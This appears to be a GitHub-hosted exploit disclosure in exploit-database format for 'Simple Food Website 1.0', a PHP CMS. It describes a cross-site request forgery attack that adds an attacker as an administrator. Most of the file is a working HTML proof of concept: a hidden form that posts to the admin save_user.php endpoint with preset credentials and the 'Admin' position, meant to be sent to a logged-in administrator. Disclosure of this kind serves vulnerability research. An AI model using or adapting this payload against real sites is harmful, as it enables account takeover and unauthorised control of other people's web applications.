Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
bugsdisclose/csrf
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
25 lines (22 sloc)
1.19 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Simple Food Website 1.0 : Account Takeover via CSRF | |
| ### Date: 25-04-2022 | |
| ### Exploit Author: Saket Saurav | |
| ### Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html | |
| ### Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code | |
| ### Version: 1.0 | |
| ### Tested on: Kali Linux 2020 | |
| ### Description : An attacker will send the specially crafted HTML page to the Admin. If the admin clicks on the link when logged in his browser session, the attacker will get added to the web portal as Admin taking over admin's account | |
| Below is the POC (exploit.html) | |
| <html> | |
| <!-- CSRF PoC - generated by saket saurav --> | |
| <body> | |
| <script>history.pushState('', '', '/')</script> | |
| <form action="http://127.0.0.1/food/admin/save_user.php" method="POST" enctype="multipart/form-data"> | |
| <input type="hidden" name="full_name" value="csrf user" /> | |
| <input type="hidden" name="username" value="csrf" /> | |
| <input type="hidden" name="password" value="csrf" /> | |
| <input type="hidden" name="position" value="Admin" /> | |
| <input type="submit" value="Submit request" /> | |
| </form> | |
| </body> | |
| </html> |